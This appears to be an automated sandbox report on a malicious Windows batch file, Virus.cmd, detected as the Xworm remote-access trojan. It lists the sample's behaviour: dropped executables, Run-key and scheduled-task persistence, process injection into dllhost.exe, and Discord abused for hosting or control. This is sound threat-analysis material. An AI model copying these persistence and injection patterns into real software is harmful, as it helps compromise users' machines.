Analysis Overview
SHA256
d90f45a296a620f69256791f49a794451c83192cd8244600c3e26c5cd0e16e94
Threat Level: Known bad
The file Virus.cmd was found to be: Known bad.
Malicious Activity Summary
Xworm
Detect Xworm Payload
Suspicious use of NtCreateUserProcessOtherParentProcess
Blocklisted process makes network request
Sets file to hidden
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Executes dropped EXE
Drops startup file
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Windows directory
Enumerates physical storage devices
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Scheduled Task/Job: Scheduled Task
Views/modifies file attributes
Checks SCSI registry key(s)
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
Suspicious use of UnmapMainImage
Uses Task Scheduler COM API
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Enumerates system info in registry
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-21 17:07
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-21 17:07
Reported
2024-06-21 17:10
Platform
win11-20240611-en
Max time kernel
145s
Max time network
153s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2496 created 640 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 1616 created 640 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe | C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe | C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Malicious.lnk | C:\ProgramData\x4V5.2.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Malicious.lnk | C:\ProgramData\x4V5.2.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.lnk | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.lnk | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SMAtMZpm.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe | N/A |
| N/A | N/A | C:\ProgramData\x4V5.2.exe | N/A |
| N/A | N/A | C:\ProgramData\x4Shellcode.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CgDFtNWD.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe | N/A |
| N/A | N/A | C:\ProgramData\x4V5.2.exe | N/A |
| N/A | N/A | C:\ProgramData\x4Shellcode.exe | N/A |
| N/A | N/A | C:\Users\Admin\x4Malicious | N/A |
| N/A | N/A | C:\Users\Admin\x4Malicious | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4Joex1 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\x4Joex1.exe" | C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\Malicious = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Malicious.exe" | C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4Malicious = "C:\\Users\\Admin\\x4Malicious" | C:\ProgramData\x4V5.2.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4V5.2 = "C:\\ProgramData\\x4V5.2.exe" | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4Shellcode = "C:\\ProgramData\\x4Shellcode.exe" | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4Joex1 = "C:\\ProgramData\\x4Joex1.exe" | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4V5.2 = "C:\\ProgramData\\x4V5.2.exe" | C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4Shellcode = "C:\\ProgramData\\x4Shellcode.exe" | C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | icanhazip.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Inventory.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Steps-Recorder.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\x4Joex1 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\x4Malicious | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\x4svc64 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe | C:\Windows\system32\curl.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe | C:\Windows\system32\curl.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Malicious | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2496 set thread context of 1100 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
| PID 1616 set thread context of 2080 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setupact.log | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setupact.log | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1718989760" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Fri, 21 Jun 2024 17:09:21 GMT" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\PersistedTitleBarData | C:\Windows\system32\ApplicationFrameHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\PersistedTitleBarData\windows.immersivecontrolpanel_cw5n1h2txye | C:\Windows\system32\ApplicationFrameHost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\PersistedTitleBarData\windows.immersivecontrolpanel_cw5n1h2txye = "2814749767500776" | C:\Windows\system32\ApplicationFrameHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\SplashScreen | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame\windows.immersivecontrolpanel_cw5n1h2txyewy!mi | C:\Windows\Explorer.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
